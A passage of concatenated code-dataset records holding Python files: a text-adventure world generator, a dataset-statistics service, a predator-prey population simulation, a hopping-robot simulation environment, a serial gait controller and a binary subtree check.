the value is the tile object\n\t\tself.worldDictionary = {}\n\n\t\t# This starts the world dictionary with the StartingRoom tile and coordinates 0,0\n\t\tself.worldDictionary[(0, 0)] = StartingRoom(0,0, self.player)\n\n\t\t# A List which holds all of the tiles which can be \n\t\t# pulled from while generating the world\n\t\tself.fillTiles = []\n\n\t\t# Originally populating the fillTiles\n\t\tself.fillTiles.extend([\"Find5GoldRoom\"]*8)\n\t\tself.fillTiles.extend([\"EmptyCavePath\"]*8)\n\n\t\tself.fillTiles.extend([\"BanditRoom\"]*8)\n\t\tself.fillTiles.extend([\"GiantSpiderRoom\"]*6)\n\t\tself.fillTiles.extend([\"ValkyrieRoom\"]*4)\n\t\tself.fillTiles.extend([\"OgreRoom\"]*2)\n\t\tself.fillTiles.extend([\"AssassinRoom\"]*1)\n\t\tself.fillTiles.extend([\"DeathKnightRoom\"]*0)\n\t\tself.fillTiles.extend([\"GiantRoom\"]*0)\n\t\tself.fillTiles.extend([\"GreenDragonRoom\"]*0)\n\t\tself.fillTiles.extend([\"WizardRoom\"]*0)\n\t\t\n\t\tself.fillTiles.extend([\"FindDaggerRoom\"]*2)\n\t\tself.fillTiles.extend([\"FindShortSwordRoom\"]*2)\n\t\tself.fillTiles.extend([\"FindQuarterStaffRoom\"]*2)\n\t\tself.fillTiles.extend([\"FindLongSwordRoom\"]*2)\n\t\tself.fillTiles.extend([\"FindBattleAxeRoom\"]*2)\n\n\t\tself.fillTiles.extend([\"FindPaddedClothRoom\"]*2)\n\t\tself.fillTiles.extend([\"FindStuddedLeatherRoom\"]*2)\n\t\tself.fillTiles.extend([\"FindChainShirtRoom\"]*2)\n\t\tself.fillTiles.extend([\"FindRingMailRoom\"]*2)\n\t\tself.fillTiles.extend([\"FindFullPlateRoom\"]*2)\n\n\n\t\tself.fillTiles.extend([\"HealRoomWeak\"]*1)\n\t\tself.fillTiles.extend([\"HealRoomMedium\"]*1)\n\t\tself.fillTiles.extend([\"HealRoomStrong\"]*1)\n\t\tself.fillTiles.extend([\"HealRoomSuperior\"]*1)\n\t\tself.fillTiles.extend([\"HealRoomExtreme\"]*0)\n\n\n\n\t\t# Used to fill in to fillTiles when fillTiles pops\n\t\tself.possibleTilesSet = {\"Find5GoldRoom\", \"EmptyCavePath\",\\\n\t\t\t\t\t\t\t\t \"BanditRoom\", \"GiantSpiderRoom\", \"ValkyrieRoom\",\\\n\t\t\t\t\t\t\t\t \"OgreRoom\", \"AssassinRoom\", \"DeathKnightRoom\",\\\n\t\t\t\t\t\t\t\t \"GiantRoom\", \"GreenDragonRoom\", \"WizardRoom\",\\\n\t\t\t\t\t\t\t\t \"FindShortSwordRoom\", \"FindDaggerRoom\", \"FindQuarterStaffRoom\",\\\n\t\t\t\t\t\t\t\t \"FindLongSwordRoom\", \"FindBattleAxeRoom\",\\\n\t\t\t\t\t\t\t\t \"FindPaddedClothRoom\", \"FindStuddedLeatherRoom\",\\\n\t\t\t\t\t\t\t\t \"FindMoonSwordRoom\",\\\n\t\t\t\t\t\t\t\t \"FindChainShirtRoom\", \"FindRingMailRoom\", \"FindFullPlateRoom\",\\\n\t\t\t\t\t\t\t\t \"HealRoomWeak\", \"HealRoomMedium\", \"HealRoomStrong\",\\\n\t\t\t\t\t\t\t\t \"HealRoomSuperior\", \"HealRoomExtreme\"}\n\n\n\n\n\tdef generate_world(self, x, y):\n\t\t\"\"\"\n\t\tThis is used to generate the tiles if a new tile needs to be generated\n\n\t\tInput:\n\t\t\tx \n\t\t\ty \n\n\t\tOutput:\n\t\t\tadds the key (x,y) to the _world dictionary with the tile object as the value\n\t\t\"\"\"\n\t\tif self.tile_exists(x, y):\n\t\t\tpass\n\n\t\telse:\n\t\t\tself.worldDictionary[(x, y)] = getattr(__import__('MapTiles'), self.pick_new_tile()) (x,y, self.player)\n\n\n\tdef game_over_room(self, x, y):\n\t\t\"\"\"\n\t\tSets the player to the GameOverRoom game tile\n\n\t\tInput:\n\t\t\tx \n\t\t\ty \n\t\t\"\"\"\n\t\tself.worldDictionary[(x, y)] = GameOverRoom(x,y, self.player)\n\n\n\tdef pick_new_tile(self):\n\t\t\"\"\"\n\t\tThis picks a random tile from the new_world list\n\t\tIt also adds a new element to the list from the set of all possible tiles so it can go on forever\n\t\tTBD Add new tiles to the list at certain increments a different function\n\t\tTBD have a list of harder enemies in order, and once the dictionary runs out of a key\n\t\t Add the new harder enemy with a value of like 5 to start taking from\n\t\t Once the list of harder enemies is empty recreate it with a higher difficulty\n\t\t\n\t\tOutput:\n\t\t\tnew_tile_name \n\t\t\"\"\"\n\t\trandom.shuffle(self.fillTiles)\n\t\tnew_tile_name = self.fillTiles.pop()\n\t\tadd_to_list = list(self.possibleTilesSet)\n\t\trandom.shuffle(add_to_list)\n\n\t\tself.fillTiles.append(add_to_list[0])\n\n\t\tself.tile_count\n\n\t\tself.tile_count += 1\n\n\t\treturn new_tile_name\n\n\n\tdef how_many_tile(self):\n\t\t\"\"\"\n\t\tReturns variable tile_count\n\n\t\tOutput:\n\t\t\ttile_count \n\t\t\"\"\"\n\t\treturn self.tile_count\n\n\n\n\n\tdef tile_exists(self, x, y):\n\t\t\"\"\"\n\t\tCheck if there is a tile at the coordinate x,y\n\n\t\tInput:\n\t\t\tx \n\t\t\ty \n\n\t\tOutput:\n\t\t\tvalue of x,y key in world dict \n\t\t\"\"\"\n\t\treturn self.worldDictionary.get((x,y))\n","sub_path":"adventure/World.py","file_name":"World.py","file_ext":"py","file_size_in_byte":5045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"228948846","text":"\"\"\"\n Module for fields definition and fields statistics\n\"\"\"\nfrom collections import defaultdict\nimport pickle\nfrom app import logger\nfrom app.helper import DataSetPandas, UserFilesManager\n\n\ndef fields_definition(filename, filter=None):\n \"\"\" This function defines fields to defaultdict in dict\n to store column names, their values and count of this values in column for statistic\n :param filename: parameter for your filename\n :param filter: tuple: name of column and value for filter\n :return dict: {'Air bags': {'max': 4, 'min': 0}, 'Body': ['MPV', 'SUV', [Sedan],\n 'Climate control': ['Yes', 'No']}\n \"\"\"\n dataframe = DataSetPandas()\n logger.info(filename)\n dataframe.read(filename)\n\n if filter:\n dataframe.filter_set(filter)\n\n cl_names = dataframe.get_column_names()\n\n field_def = {}\n for cl_name in cl_names:\n cl_name_val = dataframe.get_column_values(cl_name)\n if isinstance(cl_name_val[0], str):\n field_def[cl_name] = list(set(dataframe.get_column_values(cl_name)))\n else:\n field_def[cl_name] = dict(min=min(cl_name_val), max=max(cl_name_val))\n\n return field_def\n\n\ndef fields_statistics(dataset):\n \"\"\" This function defines fields to defaultdict in dict\n to store column names, their values and count of this values in column for statistic\n :param dataset: dataset instance\n :return dict: {'Air bags': {4: 8, 0: 8}, 'Body': {'MPV': 11, 'Sedan': 7}, 'Climate control': {'Yes': 30, 'No': 19}}\n \"\"\"\n ufm = UserFilesManager(dataset.user_id)\n file_path = ufm.get_serialized_file_path(dataset.file_id) # Exchange with UserFileManager\n\n with open(file_path, 'rb') as file:\n dataframe = DataSetPandas(pickle.load(file))\n\n if dataset.included_rows:\n dataframe.dataframe = dataframe.dataframe.iloc[dataset.included_rows]\n\n cl_names = list(dataframe.get_column_names())\n\n field_def = {}\n for cl_name in cl_names:\n default_dict = defaultdict(int)\n cl_name_val = list(dataframe.get_column_values(cl_name))\n for val in cl_name_val:\n default_dict[val] += 1\n field_def[cl_name] = default_dict\n return field_def\n\n\ndef get_data_preview(dataset, number_of_rows):\n \"\"\"\n Returns dict with names of columns and first 10 or less rows\n :param dataset: dataset instance\n :param number_of_rows: number of rows to show\n :return: dict with list with names of columns and list with lists of values of rows\n \"\"\"\n ufm = UserFilesManager(dataset.user_id)\n file_path = ufm.get_serialized_file_path(dataset.file_id) # Exchange with UserFileManager\n\n with open(file_path, 'rb') as file:\n dataframe = DataSetPandas(pickle.load(file))\n\n if dataset.included_rows:\n dataframe.dataframe = dataframe.dataframe.iloc[dataset.included_rows]\n\n return {'columns': list(dataframe.get_column_names()),\n 'rows': dataframe.amount_of_rows(number_of_rows)}\n","sub_path":"car-statistics/app/services/file_data.py","file_name":"file_data.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"166426876","text":"#!/usr/bin/python\r\n\r\nclass Prey:\r\n\r\n\tdef __init__(self, n, m, food, r, a = [], g = []):\r\n\t\tself.number = n\r\n\t\tself.mass = m\r\n\t\tself.food = food\r\n\t\tself.rate = r\r\n\t\tself.alpha = a\r\n\t\tself.gamma = g\r\n\t\t\t\r\n\t\t#number is just the number of the Prey there are\r\n\t\t#mass is how much \"energy\" or \"food\" they are worth when killed. It also relates the carrying capacity to the \"energy\" or \"food\" available to the species\r\n\t\t#rate is just the rate at which they breed. If the carrying capacity was infinite, the growth would look like exp(rate*t)\r\n\t\t#alpha[j] is a measure of how prey species j impacts the growth of the species in question. NOTE: if we declare a Prey class as prey#[i], then alpha[i] must be one (as this is how the carrying capacity makes sense in the units of food/mass)\r\n\t\t#gamma[j] measures how predator species j hunting on this species is mitigated. It can allow for mutualism if it is larger than the corresponding beta in the predator class.\r\n\tdef evolve():\r\n\t\treturn 0\r\n\r\nclass Pred:\r\n\r\n\tdef __init__(self, n, m, e, dec, b = [], d = []):\r\n\t\tself.number = n\r\n\t\tself.mass = m\r\n\t\tself.efficiency = e\r\n\t\tself.decline = dec\r\n\t\tself.beta = b\r\n\t\tself.delta = d\r\n\t\t\r\n\t\t#mass and number are same ideas as for prey\r\n\t\t#efficiency is what percentage of prey's mass the predator can convert into food for itself\r\n\t\t#decline is the rate of linear decline (if it were the only species, it would decline with exp(-decline*t))\r\n\t\t#beta[j] measures how well this species kills the prey species j (this is how the predators get food)\r\n\t\t#delta[j] measures how well this species kills the predator species j (note: the delta matrix both causes predators to grow and to decline, depending on relative sizes of parameters and populations)\r\n\t\t#in theory, delta can allow for canabalism in a species - although this is always a bad idea from a standpoint of maximising populations\r\n\t\t#delta does not allow mutualism between predators - this could be introduced easily.\r\n\r\n\tdef evolve():\r\n\t\treturn 0\r\n\r\n#will return a vector with entry i being the time derivitive of prey species i (note - x is list of prey, y is list of predators)\r\ndef CLVx(x,y):\r\n\tderiv = []\r\n\tfor i in range (0, len(x)):\r\n\t\t#the part of the model which is competition between prey species for food\r\n\t\tcompetition = 0.0\r\n\t\tcapacity = x[i].food / x[i].mass\r\n\t\t\r\n\t\t\r\n\t\tfor j in range (0, len(x)):\r\n\t\t\tcompetition += x[i].alpha[j] * x[j].number\r\n\t\tbreeding = x[i].rate * x[i].number * (1 - competition/capacity)\r\n\t\r\n\t\t\r\n\t\t#this is the prey being hunter by all the predators\r\n\t\thunting = 0.0\r\n\t\tfor j in range (0,len(y)):\r\n\t\t\thunting += (y[j].beta[i] - x[i].gamma[j]) * y[j].number\r\n\t\thunting *= x[i].number\r\n\t\t\r\n\t\t\r\n\t\tderiv.append(breeding - hunting)\r\n\treturn deriv\t\r\n\r\n#will return a list with entry i being the time derivative of predator species i\t\r\ndef CLVy(x,y):\r\n\tderiv=[]\r\n\tfor i in range(0,len(y)):\r\n\t\t#natural decline of the preds\r\n\t\tdecline = y[i].number * y[i].decline\r\n\t\t\r\n\t\t#growth from killing prey\r\n\t\thunting_prey = 0.0\r\n\t\tfor j in range (0, len(x)):\r\n\t\t\thunting_prey += (y[i].efficiency / y[i].mass)*y[i].beta[j] * y[i].number * (x[j].number * x[j].mass)\r\n\t\t\r\n\t\t#both growth and decline from predator predator interaction\r\n\t\tpredpred_interaction = 0.0\r\n\t\tfor j in range (0,len(y)):\r\n\t\t\tkilling_preds = (y[i].efficiency / y[i].mass) * y[i].delta[j] * y[i].number * y[j].number * y[j].mass\r\n\t\t\tkilled_by_preds = y[i].number * y[j].number * y[j].delta[i]\r\n\t\t\t\r\n\t\t\tpredpred_interaction += killing_preds - killed_by_preds\r\n\t\t\r\n\t\tderiv.append(hunting_prey - decline + predpred_interaction)\r\n\treturn deriv\r\n\r\n\r\n#initialises 4 prey species and 2 predators, with the parameters labelled as such\r\nx=[]\r\ny=[]\r\nx1 = Prey(0.4,0.9,5.0,0.05,[1,0.05,0.02,0.15],[0.0,0.0])\r\nx2 = Prey(0.3,1.3,5.0,0.08,[0.03,1.0,0.01,0.12],[0.0,0.0])\r\nx3 = Prey(0.4,0.2,5.0,0.15,[0.0,0.0,1.0,0.27],[0.0,0.0])\r\nx4 = Prey(0.5,15.0,10.0,0.03,[0.02,0.04,0.0,1.0],[0.0,0.0])\r\n\r\ny1 = Pred(0.4,1.0,0.3,0.08,[0.01,0.05,0.0,0.03],[0.0,0.0])\r\ny2 = Pred(0.3,1.0,0.8,0.08,[0.07,0.04,0.25,0.0],[0.0,0.0])\r\n\r\n\r\nx.append(x1)\r\nx.append(x2)\r\nx.append(x3)\r\nx.append(x4)\r\ny.append(y1)\r\ny.append(y2)\r\n\r\n\r\n#this is a work in progress to make CLV_PlotAll more readable\r\ndef Iterate_once(x,y,h,t):\r\n\tsize = len(x) + len(y)\r\n\tfor i in range (0,len(x)):\r\n\t\tvec = CLVx(x,y)\r\n\t\tx[i].number += h*vec[i]\r\n\t\tt += h/size\r\n\t\tprint (t, x[i].number, end = \" \")\r\n\tfor i in range (0,len(y)):\r\n\t\tvec = CLVy(x,y)\r\n\t\ty[i].number += h*vec[i]\r\n\t\tt += h/size\r\n\t\tprint (t, y[i].number, end = \" \")\r\n\tprint(\"\")\r\n\r\n\r\n\t\r\n#this function takes a list of prey (x) and preds (y) and evolves them out to t in n steps (leapfrog algorithm)... this is one place where the code could definitely be improved as a higher order version would be much better obviously\r\n#it prints out the current time along with the relevant population so that output looks like a bunch of colums, relating to the species in question. This can then be plotted with something like gnuplot.\r\ndef CLV_PlotAll(x,y,t,n):\r\n\th = t/n\r\n\tsize = len(x) + len(y)\r\n\tt_ticking = 0.0\r\n\t\r\n\t#step zero (prints out starting x and y with corresponding t)\r\n\t\r\n\tfor i in range(0, len(x)):\r\n\t\tprint (t_ticking, x[i].number, end = \" \")\r\n\tfor i in range(0, len(y)):\r\n\t\tprint (t_ticking, y[i].number, end = \" \")\r\n\tprint(\"\")\r\n\t\r\n\t#step one\r\n\t\r\n\tfor i in range (0,len(x)):\r\n\t\tvec = CLVx(x,y)\r\n\t\tx[i].number += (1+i)*(h/size)*vec[i]\r\n\t\tt_ticking += h/size\r\n\t\tprint (t_ticking, x[i].number, end = \" \")\r\n\tfor i in range (0,len(y)):\r\n\t\tvec = CLVy(x,y)\r\n\t\ty[i].number += (1+i+len(x))*(h/size)*vec[i]\r\n\t\tt_ticking += h/size\r\n\t\tprint (t_ticking, y[i].number, end = \" \")\r\n\tprint(\"\")\r\n\r\n\t#main part of algorithm\r\n\tfor j in range (0,n-1):\r\n\t\tfor i in range (0,len(x)):\r\n\t\t\tvec = CLVx(x,y)\r\n\t\t\tx[i].number += h*vec[i]\r\n\t\t\tt_ticking += h/size\r\n\t\t\tprint (t_ticking, x[i].number, end = \" \")\r\n\t\tfor i in range (0,len(y)):\r\n\t\t\tvec = CLVy(x,y)\r\n\t\t\ty[i].number += h*vec[i]\r\n\t\t\tt_ticking += h/size\r\n\t\t\tprint (t_ticking, y[i].number, end = \" \")\r\n\t\tprint(\"\")\r\n\t\r\n\t#last step\r\n\tt_ticking = t\r\n\tfor i in range (0,len(x)):\r\n\t\tvec = CLVx(x,y)\r\n\t\tx[i].number += h/size * (size - 1 - i)*vec[i]\r\n\t\tprint (t_ticking, x[i].number, end = \" \")\r\n\t\r\n\tfor i in range (0,len(y)):\r\n\t\tvec = CLVy(x,y)\r\n\t\ty[i].number += h/size * (size - 1 - i - len(x))*vec[i]\r\n\t\tprint (t_ticking, y[i].number, end = \" \")\r\n\r\n\treturn x,y\r\n\t\r\nCLV_PlotAll(x,y,500.0,1500)\r\n","sub_path":"MainScript.py","file_name":"MainScript.py","file_ext":"py","file_size_in_byte":6352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"209118142","text":"\nimport sys, os, random, time\nfrom math import *\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\nimport numpy as np\nimport world_class as wc\nimport ode\n\n\nclass Hopping(wc.W2):\n def __init__(self):\n #親クラスを初期化\n super(Hopping,self).__init__(bon=1,g=4.0)\n\n self.Time_Limit=500\n\n #各次元数\n self.s_dim=6\n self.act_dim=2\n\n #入力の値の範囲(全次元統一で−1、1)\n self.act_high_low=np.array([1,-1])#入力は必ず-1から1の範囲とする\n\n #行動の角次元のトルクの最大絶対値\n self.act_scale=np.array([-50,50])#入力をこれでスケーリングして使う\n\n\n #x方向を軸とする回転行列を生成する関数\n def rotate_x(self,r):\n\n C = np.cos(r)\n S = np.sin(r)\n\n # x軸周りの回転行列\n R_x = [[1, 0, 0],[0, C, -S],[0, S, C]]\n\n return R_x\n\n #z方向を軸とする回転行列を生成する関数\n def rotate_z(self,r):\n\n C = np.cos(r)\n S = np.sin(r)\n\n # z軸周りの回転行列\n R_z=[[C,-S,0],[S,C,0],[0,0,1]]\n\n return R_z\n\n\n\n #hoppingロボットを生成\n def set_bodies(self):\n\n #初期に傾ける角度を決定\n rand=np.random.uniform(-np.pi/8,np.pi/8)\n\n #乱数をもとに回転行列を生成。\n Rx=self.rotate_x(rand)\n Rz=self.rotate_z(rand)\n\n #原点の周りにx軸回転し、そのあとに移動した点周りにz軸回転\n r=np.dot(Rz,Rx)\n\n #リストからタプルに変換\n R=[]\n for i in range(0,3):\n for j in range(0,3):\n R.append(r[i][j])\n\n\n #回転行列を用いて頭の位置の導出\n M=np.dot(Rz,np.dot(Rx,[[0],[4],[0]]))\n x1=M[0]\n y1=M[1]\n z1=M[2]\n\n #回転行列を用いて足1の位置の導出\n M=np.dot(Rz,np.dot(Rx,[[0],[3],[0]]))\n x2=M[0]\n y2=M[1]\n z2=M[2]\n\n #回転行列を用いて足2の位置の導出\n M=np.dot(Rz,np.dot(Rx,[[0],[2],[0]]))\n x3=M[0]\n y3=M[1]\n z3=M[2]\n\n\n #オブジェクトの生成\n self.create_ball(position=(x1,y1,z1),rotation=R,m=25,r=0.5)#あしのひら\n\n\n self.create_link(position=(x2,y2,z2),rotation=R,lx=0.1,ly=1,lz=0.1)#あしのひら\n\n self.create_link(position=(x3,y3,z3),rotation=R,lx=0.05,ly=1,lz=0.05)#あしのひら\n\n\n #geomの設定\n for g in self.geom:\n self.gp[1].add(g)\n\n\n #jointの設定\n self.j.append(ode.HingeJoint(self.world))\n self.j[0].attach(self.parts[0],self.parts[1])\n self.j[0].setAxis((0,2,0))\n self.j[0].setAnchor((1,0,0))\n self.j[0].setParam(ode.ParamVel,0)\n\n self.j.append(ode.SliderJoint(self.world))\n self.j[1].attach(self.parts[1],self.parts[2])\n self.j[1].setAxis((0,1,0))\n self.j[1].setParam(ode.ParamHiStop,-0.1)\n self.j[1].setParam(ode.ParamLoStop,0.1)\n\n #胴体と足1を固定する\n self.j.append(ode.FixedJoint(self.world))\n self.j[2].attach(self.parts[0],self.parts[1])\n self.j[2].setFixed()\n\n #足1と足2を固定する\n self.j.append(ode.FixedJoint(self.world))\n self.j[3].attach(self.parts[1],self.parts[2])\n self.j[3].setFixed()\n\n #観測した状態を出力する関数\n def return_observation(self):\n\n pos =self.parts[0].getPosition()\n # x2 =link2.getPosition()\n\n #球と足の状態を取得\n pinP=self.parts[0].getPosition()\n linkP=self.parts[1].getPosition()\n\n #位置の差分を計算\n x=pinP[0]-linkP[0]\n y=pinP[1]-linkP[1]\n z=pinP[2]-linkP[2]\n\n #足の中心と球の距離を計算\n R1=np.sqrt(y**2+z**2)\n\n #球の角���を計算\n sita1=np.arcsin(z/R1)\n\n R2=(x**2+y**2)**(1/2)\n\n sita2=np.arcsin(x/R2)\n\n w=self.parts[0].getLinearVel()\n\n obs = np.array([pos[0],sita1,w[0],pos[2],sita2,w[2]])\n\n\n return obs\n\n\n def return_reward(self,obs):#報酬を返す\n\n pos_link2=self.parts[2].getPosition()\n pos_head=self.parts[0].getPosition()\n\n\n if(pos_head[2]<-5 or pos_head[2]>5 or pos_head[1]<1):\n r=-10\n\n else:\n r=10-(abs(obs[0]))-abs(obs[1])-abs(obs[2])-(abs(obs[3]))-(abs(obs[4]))-abs(obs[5])-(abs(pos_link2[0]))-abs(pos_link2[2])\n\n\n return r\n\n\n\n def step(self,action):#アクションを入力すると演算して次の状態、報酬、終了フラグ、0を返す\n\n u=[0.0,0.0]\n #actionは1~-1の尺度で渡す\n action=action*self.act_scale#アクションをトルクのスケールにする\n\n #10%の確率で行動にノイズを加える。\n if(np.random.rand()<0.1):\n noise1=np.random.normal()\n else:\n noise1=0\n\n if(np.random.rand()<0.1):\n noise2=np.random.normal()\n else:\n noise2=0\n\n\n #行動の実行\n u[0]=action[0]+noise1\n u[1]=action[1]+noise2\n\n\n #球と足の状態を取得\n pinP=self.parts[0].getPosition()\n linkP=self.parts[1].getPosition()\n\n R=(pinP[0]**2+pinP[1]**2)**(1/2)\n\n y=pinP[1]-linkP[1]\n x=pinP[0]-linkP[0]\n\n arcsitaxy=x/R\n\n #角度のクリッピング(overflow防止)\n if abs(arcsitaxy)>=0.99999:\n arcsitaxy=0.99999\n\n sitaxy=np.arcsin(arcsitaxy)\n\n #位置の差分を計算\n y=pinP[1]-linkP[1]\n z=pinP[2]-linkP[2]\n\n #足の中心と球の距離を計算\n R=np.sqrt(y**2+z**2)\n\n arcsitayz=z/R\n\n #角度のクリッピング(overflow防止)\n if abs(arcsitayz)>=0.99999:\n arcsitayz=0.99999\n\n sitayz=np.arcsin(arcsitayz)\n\n #球の状態に合わせて左右に力を加える\n self.parts[0].addForce((u[1]*np.sin(np.pi/2-sitaxy),-u[0]*np.cos(np.pi/2-sitayz)-u[1]*np.cos(np.pi/2-sitaxy),u[0]*np.sin(np.pi/2-sitayz)))\n\n\n self.space.collide((self.world, self.contactgroup), self.near_callback)\n\n # Simulation step\n self.world.step(self.dt)\n\n # Remove all contact joints\n self.contactgroup.empty()\n\n self.total_time += self.dt\n self.lasttime = time.time()\n s=self.return_observation()\n r=self.return_reward(s)\n\n self.T+=1\n if self.T>=self.Time_Limit:\n done=True\n else:\n done=False\n #done=max(False,Kokeru)#時間が過ぎていなくても、こけていれば終了\n #print(self.link[2].getPosition[2])\n self.view_posi=(-10,2,self.parts[2].getPosition()[2])\n self.focus_posi=(0,2,self.parts[2].getPosition()[2])\n\n return s,r,done,0#状態、報酬、終了フラグ、0\n\n\n\n def _keyfunc (self,c, x, y):#キーボード、任意に書き換える\n print(c)\n if c==102:\n self.j[0].addTorque(10)\n elif c==103:\n self.j[0].addTorque(-10)\n elif c==100:\n self.j[1].addTorque(10)\n elif c==101:\n self.j[1].addTorque(-10)\n print(c)\n\n\n def reset(self):#環境をリセット\n\n self.set_init()#クラスを初期化\n self.set_bodies()\n self.T=0\n s=self.return_observation()\n return s\n","sub_path":"TRPO/Hopping_test.py","file_name":"Hopping_test.py","file_ext":"py","file_size_in_byte":7427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"54767773","text":"\n\n\n\nimport sys\nimport serial\nimport time\n\ndef flush(serial_port):\n serial_port.reset_input_buffer()\n serial_port.reset_output_buffer()\n time.sleep(0.001)\n\ndef send_command(serial_port, input_string, delay_time):\n to_microcontroller_msg = f'{input_string}'\n serial_port.write(to_microcontroller_msg.encode('UTF-8'))\n if delay_time < 0:\n delay_time = 0\n time.sleep(delay_time/1000)\n\ndef sleepUntil(start_time, wait_until_since_start, dt):\n # the wall time when this function should complete:\n final_time = start_time + wait_until_since_start\n # then loop until we've waited long enough\n while time.time() < final_time:\n time.sleep(dt)\n\ndef execute_gait_cycle(serial_port, action_dict): \n actions = action_dict\n primitives = actions.keys()\n start_time = time.time()\n command_sequence = sorted(actions.items())\n for command in command_sequence:\n msg = command[1]\n command_time = command[0]\n #print(\"Attempting to send \" + msg + \" at time \" + str(command_time) + \", current time is \" + str((rospy.get_time() - start_time)*1000))\n sleepUntil(start_time,command_time/float(1000), 0.001)\n #print(\"After sleeping current time is: \" + str((rospy.get_time() - start_time)*1000))\n\n # 1) add on the required newline\n if msg[-1] != \"\\n\":\n msg = msg + \"\\n\"\n # We seem to be getting some mis-aligned commands.\n # So, before anything else, write a newline each time. This should clear the junk out?\n \n #self.serial_port.write(\"! c\\n\")\n # give the microcontroller a moment\n # maybe 20 ms?\n clear_delay = 0.02\n time.sleep(clear_delay)\n \n #self.serial_port.write(\"! c\\n\")\n # 3) Send the message\n send_command(serial_port, msg, 0)\n # send debugging back to terminal\n print(\"Wrote command to serial port: \" + msg[:-1] + \" @; \" + str((time.time() - start_time)*1000))\n\n else:\n print(\"Invalid action\")\n #Send ready gisignal\n print(\"Done.\")\n\ndef mayonnaise_instrument(device_name, activation_time = 250, frequency = 1, phase = 0.5):\n print(device_name, activation_time, frequency, phase)\n # A welcome message\n print(\"Running serial_tx_cmdline node with device: \" + device_name)\n # create the serial port object, non-exclusive (so others can use it too)\n serial_port = serial.Serial(port=device_name, baudrate=115200, timeout=1,\n exclusive=False) # flush out any old data\n flush(serial_port)\n # finishing setup.\n print(\"Opened port. Ctrl-C to stop.\")\n # activation_time = 70\n # frequency = 1.2\n # phase = 0.5\n period = 1000/frequency # milliseconds\n cooling_time = period - activation_time\n active = 300\n send_command(serial_port, \"p \" + str(activation_time), 0)\n w = 0\n # If not using ROS, we'll do an infinite loop:\n while True:\n # request something to send\n try:\n # execute_gait_cycle(serial_port, {100: \"h 2 18\", 300: \"l 2 18\", 301: \"h 1 3 16 19\", 600: \"l 1 3 16 19\", 650: \"h 0 1 16 17\", 850: \"l 0 1 16 17\",\n # 851+w: \"h 0 1 18 19\", 1050+w: \"l 0 1 18 19\", 1100+w: \"h 0 1 18 19\", 1300+w: \"l 0 1 18 19\", 2500+w: \"s\"})\n # execute_gait_cycle(serial_port, {100: \"h 2 18\", 300: \"l 2 18\", 301: \"h 1 3 16 19\", 600: \"l 1 3 16 19\", \n # 650: \"h 0 1 16 17\", 950: \"l 0 1 16 17\", 1500: \"s\"})\n # WD Patrick\n # execute_gait_cycle(serial_port, {100: \"h 5 19\", 300: \"l 5 19\", 400: \"h 4 6 16 18\", 700: \"l 4 6 16 18\", \n # 701: \"h 6 16\", 1000: \"h 7 17\", 1350: \"l 6 16\", 1450: \"l 7 17\", 3000: \"s\"})\n # # normal weighted PATRICK\n\n # MiniPATRICK Tests\n #execute_gait_cycle(serial_port, {1: \"h 0\", 50: \"h 2\", 150: \"l 0\", 201: \"h 1\", 250: \"l 2\", 350: \"h 3\", 400: \"l 1\", 500: \"h 0\", 550: \"l 3\"})\n execute_gait_cycle(serial_port, {1: \"h 0 2\", active: \"l 0 2\", 2000: \"h 1 3\", 2000 + active: \"l 1 3\", 4000: \"l 0 2\"})\n\n # normal weighted PATRICK\n # execute_gait_cycle(serial_port, {100: \"h 0 14\", 300: \"l 0 14\", 400: \"h 1 3 13 15\", 700: \"l 1 3 13 15\", \n # 701: \"h 3 13\", 1000: \"h 2 12\", 1350: \"l 3 13\", 1450: \"l 2 12\", 3000: \"s\"})\n\n # execute_gait_cycle(serial_port, {100: \"h 4 18\", 300: \"l 4 18\", 400: \"h 5 6 19 17\", 700: \"l 5 6 19 17\", \n # 701: \"h 5 17\", 1000: \"h 7 16\", 1350: \"l 5 17\", 1450: \"l 7 16\", 3000: \"s\"})\n # execute_gait_cycle(serial_port, {100: \"h 1 15\", 200: \"l 1 15\", 210: \"h 0 2 12 14\", 350: \"l 0 2 12 14\", \n # 351: \"h 2 12\", 360: \"h 3 13\", 600: \"l 2 3 12 13\", 3000: \"s\"})\n except KeyboardInterrupt:\n # Nicely shut down this script.\n print(\"\\nShutting down serial_tx_cmdline...\")\n sys.exit()\n\n\n\n # the main function: just call the helper, while parsing the serial port path.\nif __name__ == '__main__':\n try:\n # the 0-th arg is the name of the file itself, so we want the 1st.\n mayonnaise_instrument(sys.argv[1])\n except KeyboardInterrupt:\n # why is this here?\n pass\n\n","sub_path":"MiniPatrick/patrick_demo.py","file_name":"patrick_demo.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"477622974","text":"# 输入两棵二叉树A,B,判断B是不是A的子结构。(ps:我们约定空树不是任意一个树的子结构\n# -*- coding:utf-8 -*-\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n def HasSubtree(self, pRoot1, pRoot2):\n # write code here\n if not pRoot1 or not pRoot2:\n return False\n return self.is_subtree(pRoot1, pRoot2) or self.HasSubtree(pRoot1.left, pRoot2) \\\n or self.HasSubtree(pRoot1.right, pRoot2)\n\n def is_subtree(self, A, B):\n if not B:\n return True\n if not A or A.val != B.val:\n return False\n return self.is_subtree(A.left, B.left) and self.is_subtree(A.right, B.right)\n\nclass Solution1:\n def __init__(self):\n self.lst = []\n\n def add_to_lst(self, pRoot):\n if pRoot is None:\n return\n self.lst.append(pRoot.val)\n self.add_to_lst(pRoot.left)\n self.add_to_lst(pRoot.right)\n\n def HasSubtree(self, pRoot1, pRoot2):\n # write code here\n if pRoot1 == None or pRoot2 == None:\n return False\n\n self.add_to_lst(pRoot1)\n list1 = self.lst\n self.lst = []\n self.add_to_lst(pRoot2)\n list2 = self.lst\n while len(list1) != len(list2):\n if list1[:len(list2)] == list2:\n return True\n else:\n list1 = list1[1:]\n if list1 == list2:\n return True\n else:\n return False\n\nif __name__ == '__main__':\n s = Solution()\n node1 = TreeNode(1)\n node2 = TreeNode(2)\n 